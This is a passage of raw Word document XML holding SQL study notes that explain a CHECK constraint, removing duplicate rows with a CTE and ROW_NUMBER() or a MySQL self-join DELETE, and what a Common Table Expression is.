          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    emp_name VARCHAR(100),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487298F4" w14:textId="77777777" w:rsidR="00666CEF" w:rsidRPr="00666CEF" w:rsidRDefault="00666CEF" w:rsidP="00666CEF">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666CEF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    salary DECIMAL(10, 2),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F62B150" w14:textId="77777777" w:rsidR="00666CEF" w:rsidRPr="00666CEF" w:rsidRDefault="00666CEF" w:rsidP="00666CEF">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666CEF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    CONSTRAINT chk_salary CHECK (salary &gt; 5000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383940C0" w14:textId="77777777" w:rsidR="00666CEF" w:rsidRPr="00666CEF" w:rsidRDefault="00666CEF" w:rsidP="00666CEF">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666CEF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0775D4CE" w14:textId="77777777" w:rsidR="00666CEF" w:rsidRPr="00666CEF" w:rsidRDefault="00666CEF" w:rsidP="00666CEF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666CEF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔍</w:t>
      </w:r>
      <w:r w:rsidRPr="00666CEF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E718826" w14:textId="77777777" w:rsidR="00666CEF" w:rsidRPr="00666CEF" w:rsidRDefault="00666CEF" w:rsidP="00666CEF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666CEF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chk_salary is the name of the constraint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7481052D" w14:textId="77777777" w:rsidR="00666CEF" w:rsidRPr="00666CEF" w:rsidRDefault="00666CEF" w:rsidP="00666CEF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666CEF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(salary &gt; 5000) ensures no row can be inserted or updated with salary ≤ 5000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581D2A69" w14:textId="099A2404" w:rsidR="00666CEF" w:rsidRDefault="00000000" w:rsidP="00591CC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E896FFD">
          <v:rect id="_x0000_i2982" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F68C7A" w14:textId="6347119D" w:rsidR="003F368A" w:rsidRPr="00CE4B95" w:rsidRDefault="00D6157E" w:rsidP="003F368A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6157E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to remove duplicate records from table which does not have primary key</w:t>
      </w:r>
      <w:r w:rsidR="003F368A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E997DB" w14:textId="2184A5D0" w:rsidR="003B27A1" w:rsidRPr="003B27A1" w:rsidRDefault="003B27A1" w:rsidP="0045522A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">To remove duplicate records from a table </w:t>
      </w:r>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>without a primary key or unique constraint</w:t>
      </w:r>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CTE (Common Table Expression)</w:t>
      </w:r>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with ROW_NUMBER() or DELETE with a subquery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21739742" w14:textId="77777777" w:rsidR="003B27A1" w:rsidRPr="003B27A1" w:rsidRDefault="003B27A1" w:rsidP="003B27A1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Method: Using CTE and ROW_NUMBER() (works in SQL Server, PostgreSQL, Oracle 12c+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7E8BA0" w14:textId="77777777" w:rsidR="003B27A1" w:rsidRPr="003B27A1" w:rsidRDefault="003B27A1" w:rsidP="003B27A1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WITH CTE AS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BF725D" w14:textId="77777777" w:rsidR="003B27A1" w:rsidRPr="003B27A1" w:rsidRDefault="003B27A1" w:rsidP="003B27A1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT *, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32930937" w14:textId="77777777" w:rsidR="003B27A1" w:rsidRPr="003B27A1" w:rsidRDefault="003B27A1" w:rsidP="003B27A1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">           ROW_NUMBER() OVER (PARTITION BY column1, column2, column3 ORDER BY id) AS rn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD55BFF" w14:textId="77777777" w:rsidR="003B27A1" w:rsidRPr="003B27A1" w:rsidRDefault="003B27A1" w:rsidP="003B27A1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    FROM your_table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D371763" w14:textId="77777777" w:rsidR="003B27A1" w:rsidRPr="003B27A1" w:rsidRDefault="003B27A1" w:rsidP="003B27A1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1588EAF6" w14:textId="77777777" w:rsidR="003B27A1" w:rsidRPr="003B27A1" w:rsidRDefault="003B27A1" w:rsidP="003B27A1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DELETE FROM CTE WHERE rn &gt; 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AAA979" w14:textId="77777777" w:rsidR="003B27A1" w:rsidRPr="003B27A1" w:rsidRDefault="003B27A1" w:rsidP="003B27A1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Replace column1, column2, column3 with the columns that define duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E345315" w14:textId="77777777" w:rsidR="003B27A1" w:rsidRPr="003B27A1" w:rsidRDefault="003B27A1" w:rsidP="003B27A1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ROW_NUMBER() assigns a number to each duplicate group. We keep the first (rn = 1) and delete the rest (rn &gt; 1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68643B72" w14:textId="77777777" w:rsidR="003B27A1" w:rsidRPr="003B27A1" w:rsidRDefault="00000000" w:rsidP="003B27A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787A5A0">
          <v:rect id="_x0000_i2983" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68497721" w14:textId="77777777" w:rsidR="003B27A1" w:rsidRPr="003B27A1" w:rsidRDefault="003B27A1" w:rsidP="003B27A1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🛠</w:t>
      </w:r>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> For MySQL (before 8.0, without CTE):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656C0A59" w14:textId="77777777" w:rsidR="003B27A1" w:rsidRPr="003B27A1" w:rsidRDefault="003B27A1" w:rsidP="003B27A1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DELETE t1 FROM your_table t1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD5DE9B" w14:textId="77777777" w:rsidR="003B27A1" w:rsidRPr="003B27A1" w:rsidRDefault="003B27A1" w:rsidP="003B27A1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">JOIN your_table t2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C9DE30" w14:textId="77777777" w:rsidR="003B27A1" w:rsidRPr="003B27A1" w:rsidRDefault="003B27A1" w:rsidP="003B27A1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  ON t1.column1 = t2.column1 AND t1.column2 = t2.column2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625DB745" w14:textId="77777777" w:rsidR="003B27A1" w:rsidRPr="003B27A1" w:rsidRDefault="003B27A1" w:rsidP="003B27A1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE t1.id &gt; t2.id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404CB81E" w14:textId="77777777" w:rsidR="003B27A1" w:rsidRPr="003B27A1" w:rsidRDefault="003B27A1" w:rsidP="003B27A1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Note: You must use a unique identifier (id or combination of row content) in the ORDER BY or WHERE condition to differentiate duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBA962F" w14:textId="539FE3D9" w:rsidR="003F368A" w:rsidRDefault="00000000" w:rsidP="00591CC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74A2CA7">
          <v:rect id="_x0000_i2984" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61556A94" w14:textId="6D7B68CA" w:rsidR="003F368A" w:rsidRPr="00CE4B95" w:rsidRDefault="00D6157E" w:rsidP="003F368A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6157E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Common Table Expression in SQL</w:t>
      </w:r>
      <w:r w:rsidR="003F368A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203A6D82" w14:textId="7BD12E28" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="00215ADE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="008503FD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Common Table Expression (CTE)</w:t>
      </w:r>
      <w:r w:rsidRPr="008503FD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in SQL is a temporary result set defined using the WITH clause that you can reference within a SELECT, INSERT, UPDATE, or DELETE statement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C87E0CD" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="00000000" w:rsidP="008503F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A4F314B">
          <v:rect id="_x0000_i2985" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C80ABE" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008503FD">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="008503FD">
        <w:rPr>
